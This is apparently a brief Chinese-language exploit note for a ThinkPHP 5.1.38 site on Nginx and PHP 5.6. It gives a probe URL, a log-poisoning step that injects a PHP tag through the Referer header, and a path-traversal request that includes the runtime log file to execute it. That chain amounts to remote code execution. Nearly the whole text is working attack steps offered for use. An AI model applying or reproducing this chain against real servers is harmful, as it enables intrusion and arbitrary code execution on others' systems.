环境说明
- 框架结构:Thinkphp5.1.38TS
- 容器版本:Nginx
- 脚本解析器版本:PHP5.6
** 第一步:判断是否存在 **
访问:
/?s=index/user/_empty?name=.1
然后出现:
代表漏洞存在,直接跳转走了得,都不算。报错500应该都可以。
** 第二步:写入执行代码 **
- 请求主网站,更改Referer
Referer: <?php phpinfo(); ?>
** 第三步:包含执行代码 **
/?s=index/user/_empty?name=../runtime/log/single.log
没有回复内容